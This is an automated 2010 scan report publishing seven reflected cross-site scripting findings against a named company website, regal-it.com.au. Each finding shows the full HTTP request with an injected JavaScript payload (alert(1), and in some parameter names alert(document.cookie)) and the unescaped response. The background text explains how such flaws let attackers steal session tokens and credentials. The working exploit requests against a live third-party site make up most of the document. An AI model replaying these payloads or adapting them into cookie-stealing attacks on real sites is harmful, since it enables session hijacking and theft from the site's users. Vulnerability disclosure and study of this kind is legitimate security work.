Report generated by XSS.CX at Wed Nov 24 19:56:25 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

Loading

1.1. http://www.regal-it.com.au/Content_Common/pg-Citrix-Information.seo [74c98'-alert(document.cookie)-'1d8a4f0dd2a parameter]

1.2. http://www.regal-it.com.au/Content_Common/pg-Citrix-Information.seo [name of an arbitrarily supplied request parameter]

1.3. http://www.regal-it.com.au/Content_Common/pg-vmware-virtualisation-software-solutions.seo [name of an arbitrarily supplied request parameter]

1.4. http://www.regal-it.com.au/content_common/Citrix.aspx [74c98 parameter]

1.5. http://www.regal-it.com.au/content_common/Citrix.aspx [74c98'-alert(document.cookie)-'1d8a4f0dd2a parameter]

1.6. http://www.regal-it.com.au/content_common/Citrix.aspx [Id parameter]

1.7. http://www.regal-it.com.au/content_common/Citrix.aspx [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.regal-it.com.au/Content_Common/pg-Citrix-Information.seo [74c98'-alert(document.cookie)-'1d8a4f0dd2a parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /Content_Common/pg-Citrix-Information.seo

Issue detail

The value of the 74c98'-alert(document.cookie)-'1d8a4f0dd2a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81258'-alert(1)-'f445a5e50e was submitted in the 74c98'-alert(document.cookie)-'1d8a4f0dd2a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Content_Common/pg-Citrix-Information.seo?74c98'-alert(document.cookie)-'1d8a4f0dd2a=181258'-alert(1)-'f445a5e50e HTTP/1.1
Host: www.regal-it.com.au
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; __utmb=199617453.1.10.1290613908; sv-714=20101124100757

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=upegx4auqclxgsi3srxxpc55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:11:48 GMT
Content-Length: 6231

<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/skin1/style.asp" type="text/css" />
<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/sharedvue.css" ty
...[SNIP]...
SyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C31&74c98'-alert(document.cookie)-'1d8a4f0dd2a=181258'-alert(1)-'f445a5e50e');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.2. http://www.regal-it.com.au/Content_Common/pg-Citrix-Information.seo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /Content_Common/pg-Citrix-Information.seo

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c98'-alert(1)-'1d8a4f0dd2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Content_Common/pg-Citrix-Information.seo?74c98'-alert(1)-'1d8a4f0dd2a=1 HTTP/1.1
Host: www.regal-it.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; __utmc=199617453; __utmb=199617453.1.10.1290613908; ASP.NET_SessionId=icq2tmqwy1jdl42bdefecdfc;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:07:57 GMT
Connection: close
Content-Length: 6026

<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/skin1/style.asp" type="text/css" />
<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/sharedvue.css" ty
...[SNIP]...
strSVPageRenderViewID = '557424';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C31&74c98'-alert(1)-'1d8a4f0dd2a=1');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.3. http://www.regal-it.com.au/Content_Common/pg-vmware-virtualisation-software-solutions.seo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /Content_Common/pg-vmware-virtualisation-software-solutions.seo

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba79b'-alert(1)-'4eea3ca8d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Content_Common/pg-vmware-virtualisation-software-solutions.seo?ba79b'-alert(1)-'4eea3ca8d48=1 HTTP/1.1
Host: www.regal-it.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; __utmc=199617453; __utmb=199617453.1.10.1290613908; ASP.NET_SessionId=icq2tmqwy1jdl42bdefecdfc;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:08:43 GMT
Connection: close
Content-Length: 17315

<link rel="stylesheet" href="http://vmware.sharedvue.net/sharedvue/skins/sharedvue.asp" type="text/css" />
<link rel="stylesheet" href="http://vmware.sharedvue.net/sharedvue/skins/skin3/style.asp" ty
...[SNIP]...
rSVPageRenderViewID = '11917043';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/VMware.aspx?Id=21B8088B-C07F-405E-8B5A-CB48A743FBD6&ba79b'-alert(1)-'4eea3ca8d48=1');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
var dtSVNow = '20101124100843';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.4. http://www.regal-it.com.au/content_common/Citrix.aspx [74c98 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /content_common/Citrix.aspx

Issue detail

The value of the 74c98 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c145b'-alert(1)-'9ab1717df5a was submitted in the 74c98 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C31&74c98c145b'-alert(1)-'9ab1717df5a HTTP/1.1
Host: www.regal-it.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; sv-714=20101124100757; __utmc=199617453; __utmb=199617453.1.10.1290613908; ASP.NET_SessionId=0uw1yn55vm4x3brrpk0ttt55;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:14:15 GMT
Connection: close
Content-Length: 6041

<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/skin1/style.asp" type="text/css" />
<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/sharedvue.css" ty
...[SNIP]...
PageRenderViewID = '557632';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C31&74c98c145b'-alert(1)-'9ab1717df5a');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.5. http://www.regal-it.com.au/content_common/Citrix.aspx [74c98'-alert(document.cookie)-'1d8a4f0dd2a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /content_common/Citrix.aspx

Issue detail

The value of the 74c98'-alert(document.cookie)-'1d8a4f0dd2a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10bd3'-alert(1)-'70e03597763 was submitted in the 74c98'-alert(document.cookie)-'1d8a4f0dd2a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C31&74c98'-alert(document.cookie)-'1d8a4f0dd2a=110bd3'-alert(1)-'70e03597763&svpage=overview HTTP/1.1
Host: www.regal-it.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; sv-714=20101124100757; __utmc=199617453; __utmb=199617453.1.10.1290613908; ASP.NET_SessionId=0uw1yn55vm4x3brrpk0ttt55;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:14:18 GMT
Connection: close
Content-Length: 6236

<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/skin1/style.asp" type="text/css" />
<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/sharedvue.css" ty
...[SNIP]...
SyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C31&74c98'-alert(document.cookie)-'1d8a4f0dd2a=110bd3'-alert(1)-'70e03597763');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.6. http://www.regal-it.com.au/content_common/Citrix.aspx [Id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /content_common/Citrix.aspx

Issue detail

The value of the Id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c8e8'-alert(1)-'7e8a0eb4cb9 was submitted in the Id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C317c8e8'-alert(1)-'7e8a0eb4cb9&74c98 HTTP/1.1
Host: www.regal-it.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; sv-714=20101124100757; __utmc=199617453; __utmb=199617453.1.10.1290613908; ASP.NET_SessionId=0uw1yn55vm4x3brrpk0ttt55;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:14:04 GMT
Connection: close
Content-Length: 6041

<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/skin1/style.asp" type="text/css" />
<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/sharedvue.css" ty
...[SNIP]...
strSVPageRenderViewID = '557605';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/Citrix.aspx?Id=2BFD89EB-2EF0-4B90-8968-6A3B60627C317c8e8'-alert(1)-'7e8a0eb4cb9&74c98');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.7. http://www.regal-it.com.au/content_common/Citrix.aspx [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regal-it.com.au
Path:   /content_common/Citrix.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31959'-alert(1)-'c845ffb9c25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content_common/Citrix.aspx?31959'-alert(1)-'c845ffb9c25=1 HTTP/1.1
Host: www.regal-it.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=199617453.1290613908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199617453.1657035665.1290613908.1290613908.1290613908.1; sv-714=20101124100757; __utmc=199617453; __utmb=199617453.1.10.1290613908; ASP.NET_SessionId=0uw1yn55vm4x3brrpk0ttt55;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 24 Nov 2010 15:13:54 GMT
Connection: close
Content-Length: 5826

<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/skin1/style.asp" type="text/css" />
<link rel="stylesheet" href="http://citrix.sharedvue.net/sharedvue/skins/sharedvue.css" ty
...[SNIP]...
ar strSVPageShortcut = 'overview';
var strSVPageRenderViewID = '557588';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.regal-it.com.au/content_common/Citrix.aspx?31959'-alert(1)-'c845ffb9c25=1');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

Report generated by XSS.CX at Wed Nov 24 19:56:25 CST 2010.